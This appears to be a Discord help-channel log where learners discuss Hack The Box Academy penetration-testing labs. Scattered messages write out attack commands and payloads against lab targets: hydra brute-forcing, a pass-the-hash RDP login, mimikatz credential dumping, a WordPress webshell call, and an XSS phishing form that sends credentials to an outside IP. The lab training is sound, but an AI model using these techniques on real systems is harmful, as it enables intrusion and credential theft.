I recall this took a while to crack since there are lots of possible passwords. Try choosing the service that you can run the most threads on and then splitting the mutated passwords into multiple files since it's quite a lot. The mutated password list I have has ||90,000+|| lines
DM me, I may be able to help. I just went through that same nonsense.
search "from: PNWAllstar" and look at my post for date/time — 11/01/2023 8:08 PM.
read from there and you'll figure it out. I went into a little detail on how I saved time instead of having to wait around forever. DM me if you need more assistance though.
You doing CPTS? If so I'm not too far ahead of you. Send a friend request if you want a study partner.
For pass-the-hash, where do I even start with this question? " Access the target machine using any Pass-the-Hash tool. Submit the contents of the file located at C:\pth.txt."
RDP?
Okay, so I was able to use the "password" as a hash
Question is misleading, the "password" is actually a hash to use with impacket-psexec
you can use a hash with xfreerdp
or any other tool you like
i did it with netexec for example
Check username and password. They are not correct
you sure winlogon is running on the system?
yes, i check in tasklist
try lsass and winlogon
okay, i am not sure but after Get-Process winlogon shouldn't you specify the id?
try Get-Process winlogon
i got 3 winlogon process, try all of these still not work
i mean you tried to use their ids right?
could you please show up tasklist also with them
yeah, it's correct
did you specify them in the above syntax?
instead of .id those pids
man, you didn't specify pid
yeah, weird
i got that
whats that
that was quick
After some rest I came to the conclusion: "Just because a user has rights over a group DOES NOT MEAN that they are in that group." So yeah, I'll try it out this afternoon and probs finish the last 2 questions.
thanks it work, i just missing double .
glad to read it
Bingo
Hi, I'm stuck on a question in the footprinting DNS module (What is the FQDN of the host where the last octet ends with "x.x.x.203"?), is it the right place to ask for help ?
Yes, you've come to the right place.
You have to find all the zones
I tried to brute force using about every hostname wordlist but I only targeted inlanefreight.htb, should I have looked for other domains?
This zone gives you all the data voluntarily. So why do you want to bruteforce it?
oh you're right, I was going in the wrong direction. I'm going to dig into zones more thoroughly and come back if I'm still stuck. Thanks for the guidance!
I am setting up my Burp Suite pro version which came with a tutorial video that how to set it up. I have also removed all old Java versions and installed the latest also it is not working. Can someone please help me with this?
Are you using burp's official documentation?
Thank you
Got the password 💪
LOGIN BRUTE FORCING --> skill assesment --> Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?
Hint: You may reuse the username you found earlier. Make sure you got the correct fail string and parameters.
Now I've tried the rockyou.txt and the lists made earlier in the module. No results i could use. What do i miss to get the correct fail string and parameters? Any nudge without too much spoiling?
No sir all files are provided by my institution.
Wouldn't be better if you have reached out to the person who wrote those at your institution
as he will be the one knowing how to install the tool
used command to brute force the first login page: ||hydra -l user -P /usr/share/wordlists/rockyou.txt 94.237.63.238 -s 45472 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='login'"||
I am trying but response is very late
But if you are speaking, then I will try once more.😇
next time add which skill assessment you are on and hint you are missing a ||-|| somewhere in your fail string, double check everything by logging the request with burp
this is the doc for the install
https://portswigger.net/burp/documentation/desktop/getting-started/download-and-install
and this is the doc for some troubleshoot
https://portswigger.net/burp/documentation/desktop/troubleshooting
Thank you so much, sir. My professional Burp Suite has been Installed and set up successfully.
Hi Everyone,
Does anyone got tips how to get NORTON 360 to stop blocking scripts like sqlmap run on VM ( Virtual Box)
The fuck
Good morning everyone - is anyone able to help with the last question on WordPress - Discovery & Enumeration? I have found the plugin but can't find the version anywhere.
why'd you have norton installed in your vm in the first place lol
I dont have
To anyone stuck on this section - the hint is very helpful.
so it's installed in your host os?
Yes
AVs can't block stuff from running in a vm, the problem is something else
I'm not sure about this, I have seen Bitdefender blocking for instance SQLmap requests running in VMs
Hello
Is nothing sacred
if the traffic is sent through the academy vpn, I don't see how it can be examined by the AV
but if it's a problem, adding a whitelist to the vm ip should do it
have you performed local troubleshooting? that's the first step, rule out your network. I would also move to #general for this type of discussion
Sure did
Something is wrong
Ah here we go
It wasn’t long but it was def sputtering
Sry thanks
Ok this site is def down
yeah
Someone needs to wake up lol
@rustic sage this isn't the place for that, read #welcome and #rules after that use /verify at #bot-commands and if you have questions about boxes ask that in #boxes and #general for general stuff like are boxes slow or is the site is down
Hello guys, how are you?
I'm trying to answer a question about the Web Proxy module:
Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you see the requests sent, what is the last line in the request?
Using Burp I was able to respond easily, but when I try to use ZAP the request doesn't even appear?
Can someone help me?
Screen shot ?
of what?
the Metasploit is configured correctly because I was able to capture the request with burp
The issue is with ZAP, I already researched and tried to resolve it but I couldn't
Screenshot of the proxy configuration (whichever tool or metasploit options you're using) and ZAP's proxy listener setting.
Yup
Does someone have a problem with the SQL part of "Attacking Common Services" ? I can't connect to the windows machine provided by HTB "Incorrect Password"
I wonder, do you have burp listener running on the same port as well?
If you opened Burp before ZAP and still have it running in the background. Your traffic are probably passed through Burp instead of ZAP.
Not sure if that's the case for you. Can you confirm.
Hi! Question for Module "INTRODUCTION TO MALWARE ANALYSIS" -> "Dynamic Analysis".
In the Module instructions is written the following:
- Run Noriben via CMD ✅
- This Opens ProcMon ✅
- Execute the malware "shell.exe" by double clicking it ✅
- There will be a popup by shell.exe that its terminating because of sandbox env recognition ✅
- Now i should terminate ProcMon and after that i should Control+C the Noriben CMD ✅
- There should be a .txt file created by Noriben, but that isnt the case at my VM. (i got two error messages when terminating Noriben, see below) 🚫
Error Messages:
Anyone know what i am doing wrong?
Anyone I can DM about Client-Side Prototype Pollution?
After getting the answer with Burp, I closed it. I don't know if after closing it some daemon is running in the background, but at first, when I test with ZAP, Burp is closed
Apparently the request doesn't even want to go through ZAP because metasploit doesn't wait for a forward.
Well, if you closed the application, then I don't think the listener would still be in place. But, try a different port just so.
I already tried my friend, but thanks anyway
nvm just had to wait after terminating procmon a few seconds
It seems that some additional configuration in ZAP is necessary.
in the browser both work perfectly, the problem is when I use msfconsole, only Burp works with it.
and I don't know why lol
Optionally, you can try running metasploit with proxychains.
I see...
who can help me to finish xml langue in this module,thanks every bro https://academy.hackthebox.com/module/216/section/2300
is htb academy down?
While submitting an answer to a module question my access was blocked by Cloudflare. Can anyone see what happened?
Just got blocked as well.
Perhaps its just an issue on their side then
Cloudflare ended up blocking access to Discord earlier in the month.
For a lot of users.
I’m blocked
Hi, I'm blocked in the academy, I've just refreshed the page while the machine was launching cuz i have an error message box. What should I do?
It's probably a Cloudflare issue.
You too? holy molly
They are gone to shit today
who can help me
a temporal problem maybe?
i come here for the same reason, nvm will pop back later
Hello I was doing my exercises when suddenly ...
😄
I'm having a deja vu kekw
i'm glad i thought i was the only one lOL
yea, something wrong with htb today
I was almost done w this box too
Me too
It was rough had me sweating like Epstein in prison until..
it's time to go outside i guess

Hell no
dam thought i had finally shown signs of a certified pentester
ohhh fixed
i was doing sql injection, i thought it was only me)
can confirm fixed
yea
life is too short make sure you spend as much time as you can front of your PC
yap
So that was a lie
dunno, it's working perfectly with me
I have a URL payload that executes XSS through Prototype Pollution on my end, but when I send it to the admin to report the URL, nothing happens. Any help? The challenge is Client-Side Prototype Pollution from the Whitebox Attacks module.
hey guys in module "Windows Privilege Escalation" ==>> "Pillaging" I can't move the "cookies.sqlite" file
any hints??
i really wish modules had videos, god knows i read slow
Anyone knows why i cant rename a subroutine in IDA during Malware Analysis (Module: Introduction to Malware Analysis).
I have the field open, but cant change anything (in the Module they just clicked "Rename" and say change it and enter)
my mom said hacking is bad and i can't hack no moreeeeeeeeeeeeeeeeeeeeeee:((((((((((😭
https://tenor.com/view/sad-meme-gif-22168680
so bye forever
Enumerating SMTP, machine is unreachable on ping, nothing works. Reset machine twice, made sure I am connected to ovpn... Any ideas?
?
sent u a DM
Unfortunately there are no hacks to bypass parents 😦
Hi I am stuck in the password attack module password mutation section I need help please
This is what I did
Hi Guys, beginner here, in the web requests modules I'm a little confused as to what url we are exactly curling for the download.php file
Hello I have a problem here I recovered Jason's password but I can't connect via ssh with
Lowercase
Hi Assembly Question:
in the Module "Introduction to malware analysis" is written, that this function is giving the "ping" command a 5 second sleep timer.
When i google the command -n 5 it says, that its sending 5 pings.
So where is the 5 seconds sleep timer in that code i posted????
oh you should research what "ping -n 5 <ip>" does
or just try by yourself in a terminal.
No one is gonna wanna dm you without more specifics of what you've tried and what hasn't worked
esp for skill assessments
its sending 5 pings, 1 every second. But that is not a sleep timer for me. In the Module its written its doing a sleep duration of 5 seconds. But thats not the case if its only the command "ping -n 5 <ip>". Because then its active for 5 seconds and not sleeping. When we are doing that logic, the sleep timer would be active if the function is not executed, but that is not defined with 5 seconds, thats unknown.
So - thats not about HTB Module is wrong or something like that, dont wanna blame anybody. I just wanna know if i am wrong or if i dont see anything in the assembler code i posted that i should have seen to realize that its a 5 second sleep.
It looks like your mv command is missing a destination file operand ... reading is hard sometimes
You're also not adding the / after tmp to designate you are moving the file to a directory which is also part of the error
Hi i am stuck on this exercise:
Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file.
I have already tried where /R C:\ waldo.txt and where waldo.txt, that doesn't work
Which Module and Section?
INTRODUCTION TO WINDOWS COMMAND LINE
Finding Files and Directories
Did you connect to the TargetHost via SSH?
yes, I can't attach a screenshot here
If the explanation isn't right or could be better, suggest an edit on the module https://discord.com/channels/473760315293696010/858470491676737536
https://academy.hackthebox.com/achievement/1009496/147
Is anyone available to talk about the Admin path? I think I went the long way.
At ATTACKING WEB APPLICATIONS WITH FFUF module, I have added target machine IP and academy.htb to /etc/hosts, but I can't verify it by visiting academy.htb:<port from target machine> when I used my own connected VM by HTBA VPN or HTBA machine. What did I miss?
wdym xd
Just a hint. Assume i have a file called "MGM.png" on my Desktop.
To find it via command line, i would use the command
where /R C: MGM.png
(Important: There is a space between C: And MGM.png
What does this? It looks in C: and all Subfolders if there is a file called MGM.png
the '\' is not necessary
but it works with it
i dont know
I have tried it too, but still getting negative response. Could you connect to this station and check pls?
thx
Did you find your mistake?
yeah
solved, i removed IP PORT from /etc/hosts
Could get the ||PSSession|| stuff to work in evil-winrm, got to RDP to the box and from there I figured the rest out for the second to last question. Thanks for the nudge and all.
No worries. It was the most I could nudge without giving the actual answer.
Glad you figured it out
Hi im doing the web proxies module, i doing this question Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. I have loaded the payload and everything as it told me but the target i dont understand.
I did http://94.287.54.59:33851/§admin§/ but it didnt work and i tried like everything but i dont get how i choose where it is supposed to fuzz?
hey, anyone around to give me a hand on the command injection module's skill assessment? i feel like i've figured out the injection point and the operator, but i'm stuck trying to get /flag.txt to display and i'm not sure how to continue from here
i had a similar problem, swapping region helped my case
solved!
Password Attacks -Network Services
Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
I am able to login into the smbclient but the flat.txt file is blank am I missing something?
any context clues would be appreciated not looking to the answer but maybe a slap in the face lol
hi im doing web proxies atm, I dont get how i put the right target when im supposed to be in admin directory
i did http://94.287.54.59:33851/§admin§/ and tried every variation of this but i dont get how to do it right
Module: SQLMap Essentials
Session: Attack Tuning
Flag6 - Should I somehow be able to figure out what prefix to use? I get it from the Hint but I dont really get how I should know that that's the prefix to use?
do you mean flag.txt or flat.txt?
flag.txt my apologies
you can dm I just finished that module
hi, could you send the screenshot how it looks in your repeater)
Module broken Authentication:
Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?
I tried to modify the reset-token_time.py but still did not get the valid token. Anyone with modified script will be great or any help will be appreciated.
Normalize not calling hard boxes easy on HTB
Sounds like a skill issue. HTB boxes difficulty scale is different from other platforms
But also not the place to voice your complaints
Read #welcome to figure out how to gain access to more of the server
Ok dad
xd
you're talking about boxes in the academy chat my guy ¯_(ツ)_/¯
But I understand that reading comprehension may be hard for you
lol you don’t know who I am
And frankly my dear, I don't give a damn
We don’t need ad hom attacks
Then read #welcome and take your complaints to the proper channel lol
It's really that simple
Nah I'm good
Genuine Module question : SMTP - trying to connect to SMTP as the academy suggested through ||telnet|| (only thing I saw in academy to connect) and connection won't work... Am I missing something? Tried ||telnet <ip> 25 and 581||
Is there any way to find what part of modules got updated? I’m doing the CPTS path and I see that several modules I’ve finished received updates.
hi im doing web proxies atm, I dont get how i put the right target when im supposed to be in admin directory
i did http://94.287.54.59:33851/§admin§/ and tried every variation of this but i dont get how to do it right
Should work with 25
Should I only need ||telnet <ip> 25?||
That's what's shown in the section yeah
Hello everyone! I've already learnt how to run the scp command
Module: Linux File Transfer Methods
Actually it works when I run it on my own machine to download and upload files but when I run it on the remote machine to transfer files it doesn't works!
I don't know why, could be because of SSL/TLS certificate
Is this normal or is there a way to make this works on the remote machine?
(Btw, I put 0.0.0.0 because the ssh server is listening on it)
Don't use 0.0.0.0, that's just shorthand for all interfaces
Also don't need ssh running on your system, the schema is scp source destination you can run it from your machine as long as there is ssh connection
Was doing the "Attacking Common Services" and under "Attacking SMB", the last question, I cant connect to ssh. Wondering if its htb or me. (I got the previous two questions correct and tried to ssh into the ip several times.
the SCP command is not going to work if you dont have port 22 as an open port right?
No, scp is not going to work if the target youre scp into doesnt have SSH service listening
port 22 is just the default ssh port
Could this 'python3 -m http.server' transfer comman work the port number 80 not being on your target machine as an open port?
you can specify a port with http.server
creating the service is what opens the port
you seem to have a misconception that ports and services are two separate things
theyre not
how do i compile c# programs like sharpup on a linux machine everything i tried gives me an error
you do not
you would use visual studio
so i just transfer the exe over
yes
if you have a pre-compiled exe you can move it over using any available file transfer method ya
noob question what would be the easiest way to get it from host windows to vm kali transfer
i usually drag and drop
you can enable drag and drop in the vm settings
tried it i dont i have bidirectional turned on but dont work for me
you also can use smbserver.py
or if you plan to do this often you can setup a shared folder from your vm to your host
prob look into fixing the drag and drop thing tho, that is pretty handy
yup
Hi everyone....
anyone who remember the ippsec video where he compress a file..!!!
I'm having issues to upload secretsdump.exe to a Windows machine
Anyone having issues with the password attacks passthehash (pth) lab?
xfreerdp is not working for the third question
Trying xfreerdp /v:<ip> /u:Administrator /p:30B3783CE2ABF1AF70F77D0660CF3453 /dynamic-resolution
getting
what I am expecting is an RDP window like I had last night.
I changed my server, redownloaded the vpn file, restarted the vpn, and restarted the machine in the lesson. Still nothing
why are you using flag /p:?
for the password
how did you access the lab for 1st and 2nd question then?
I can't even RDP to begin with though.
and
How do I enable it without RDP access
do it from other code execution tool that allows pass the hash (evil-winrm, psexec.py, netexec, crackmapexec)
it worked fine yesterday
yday you were using password
today is a hash
which is kind of the same but subtle differences are reflected in getting access denied because admin restricted mode only allows certain authentication methods by default
all of this is explained in the module
try to take notes and understand the underlying of the topic
it was discussed in the section...
They're saying to use a password, not a hash
I have access through impacket-psexec and am able to use mimikatz, I'm just stuck on why RDP is not working
Okay, figured it out. By "password" they mean "hash"
Same thing I ran into last night
yeah didn't we cover this last night??? Why'd that throw you off
Yeah, should have looked back to the previous question's wording.
So now that I'm in the RDP session, how do I extract hashes from the "current session"?
All this lesson shows is "pass the hash with mimikatz"
Tried this with no luck
Wasn't it also discussed in this section?
Where?
Did you try sekurlsa::logonpasswords?
No, what module was that in?
is it?
THIS is what fixed it
Not covered in the module.
It's covered in the Password Attacks module which assumed prior knowledge. Additionally mimikatz is not a required method for the lab. You could have used impacket which is taught in the module
oh my bad you are in password attacks
lmao it's taught in the module dude
I am doing web proxies module and I'm supposed to look in the /admin directory. How do i choose to look in there with burp? I did http://ip:port/admin$ I put the target at the end but didn't work and i tried everything help
My man seems like not reading
Where? I had to Google it.
That is nowhere in the PtH module. I triple checked.
It is indeed in the PtH module
I am having this same issue. Did you ever figure it out?
Module : Introduction to Forensics
Section : Final assessment
Hello, I started the final assessment but I don't find how to get IP of C2. Can someone help me ?
- I don't have any tools on the rdp ?
module: windows priv
section: Weak Permissions
already added htb-student to localgroup admin, but i can't do secretdump, any hint please?
the logonpasswords from mimikatz? i had to also Google it
it's not explicitly explained but idk 🤷
HACKING WORDPRESS --> Keep in mind the key WordPress directories discussed in the WordPress Structure section. Manually enumerate the target for any directories whose contents can be listed. Browse these directories and locate a flag with the file name flag.txt and submit its contents as the answer.
Looked in all the listed dirs and files mentioned in the structure part of module. But i cannot find any text that looks like flag.txt
I've also used cURL to view the dirs ( html2text)
will academy ever improve the search ?
what kind of an issue are you experiencing with the search functionality
not issue, but i hope the search display gets better
i think it can be far better
looks wise
feel free to bring it up via the support chat on the website
they will be able to forward it to the appropriate people
Ah that would be nice, i will
guys why does my computer keep blue screening and showing different codes
Hacking wordpress --> login --> Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.
Can someone explain to me where to search? Just a random search engine? Because that did not give me any relevant results.
yeah I feel the same about the search
put your feedback through support as well
is there a specific link? or just the green bubble
green bubble for the win
they will be able to hear your opinion and aggregate the data of the people who put feedback, for example on the search's functionality
does attacking common services - attacking ftp have a problem?
there is no ftp service up
Reinstall winders
What did i do wrong? Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer.
HACKING WORDPRESS -- login
There is no space between the body and the headers of the POST request
Simple but works 🙂
I'm having issues uploading secretsdump.exe to a Windows machine in the AD enum & attack skill assessment
Google "how to zip file linux"
Or run a python http server from that directory and do a web request to get it
yes
python3 -m http.server 9000
Invoke-WebRequest "http://10.10.15.xxx:9000/home/xxx/tools/impacket-examples-windows/secretsdump.exe" -OutFile "C:\Windows\Temp\secretsdump.exe"
Because you're specifying a full path for no reason
oh i see
Unless you're (for some ungodly reason) running http.server from /
You just need to specify filename
You're getting an error related to file or path not found probably from your http.server command
why wouldn't you use smbserver 😭
how
learn
There's more than one way to cut an onion
but the smbserver for this stuff is the best one, you run it you mount it on Windows with net use and you skip all the transfer stuff
you run tools from the shared folder
even cleaner, you don’t leave any junk in the client machine
hey guys
on "Windows Privilege Escalation Skills Assessment - Part I"
I got a problem with the ||certutil|| command
can someone please help?
what is the problem?
Hello everyone, first time poster here. I was just doing "Broken Authentication" module, question 2 from "Brute Forcing Usernames" exercise section. I already got the answer, however I can't help but feel there is a better way to do this, than the one I used. I wanted to ask if you could share with me what approaches you guys took to find the answer and was anyone able to automate the process, ||since every subsequent request uses the username from the previous request to either show a 'valid' or 'wrong' user||?
I opened on my VM ||python3 -m ..|| , on the site I did ||certutil -url..|| with the file
on my VM I see it's downloading but on the site I get a failed message ...
what am I missing?
I'm sorry can you rephrase everything with full commands between spoiler tags if it is necessary?
can I DM so I won't make any spoilers for anybody?
as you wish
I mean even easier is mounting via whatever rdp method
Module : XSS
Session Phishing
I'm trying to get rid of the URL upload function on the website but without success.
I added the following to the URL:
<script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.76><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
But still ends up like this:
Any idea what I'm doing wrong?
<@&861185840277487616> there's a time and place for your content
speaking of which; where did #general go?
Read #welcome
ty 🙂
Hacking WordPress --> how to navigate with spaces in the cmd's. I understand how to scroll through the backend but I don't know how to use commands with spaces (tried several options but none worked).
curl -X GET "http://94.237.56.76:30746/wp-content/themes/twentyseventeen/404.php?cmd=**pwd**"
Single quotes, url encoding, cry
url encoding...thanks.
Overlooked the simple things in life eh?
Most of the times...yeah. Will get better over time 🙂
Nah you're good, it's easy to do. "I swear I tried that... guess I didn't"
Especially when you get hit with the:
Hello! I am working on the getting started module in the CPTS path. Currently, I'm in the privilege escalation section. I have copied the private key into my machine and used chmod to set the permissions to 600. When I try to ssh in, I get the error message: Load key "id_rsa": error in libcrypto
Did you copy the -----BEGIN and -----END lines?
Yes, they're both there.
And a newline at the end?
Yep. That's the advice I got from Google and I was able to verify that.
try wc -l and compare if they are the same amount
Did you try it from the pwnbox?
Yeah, I got a different error there: Load key "id_rsa": invalid format
what syntax do you use ?
ssh root@94.237.63.238 -p 55504 -i id_rsa
Ssh service is running on port 55504?
some of the modules do that just to show you
it's possible.
Alright
Yes, that's the way I had to get into the first user
Module: CROSS-SITE SCRIPTING (XSS)
Section: Session Hijacking
Question. Is anyone experiencing issues with the targets not spawning appropriately? I've been having connectivity issues with this module most of this morning. I've reset the target host a few times, gave it time to spawn the resources needed for the module, redownloaded the VPN files, and bounced my attack box. Nada. Connectivity from my attack box works just fine.
I just get a white screen of nothing in my browser with the target IP.
Edit: Issue resolved. No idea what changed.
Hacking wordpress --> skills assessment. Website is not recognized as WP website. I've read several about adding a domain in /etc/hosts but that instruction is not (or I did not see it) in the module.
What to do so WPscan will recognize the website as a WP site? So i can enumerate it.
Adding a domain to /etc/hosts is a basic fundamental skill, which is why it's assumed for you to know
In most modules the notice what to add (not how but at least what domain or vhost)
That is why I am confused
Is that a different account than my htb academy account? I tried to log in there and it said I didn't have an account.
Most of the time it can be assumed to be inlanefreight.htb
And usually the questions allude to it
Yes
Ok, thanks.
Yes, it’s from main platform
Here is the key I'm trying to use.
Can you open in vim or Kate?
Added inlanefreight.local and inlanefreight.htb but still not recognized by WP scan as a WP website. What do i do wrong?
it's not a wordpress site 🙂
just do it from inside the machine
Yep. Straight from the .ssh folder in root's directory.
i think inside the machine it's port 22
I don’t really see anything wrong with the key
check with netstat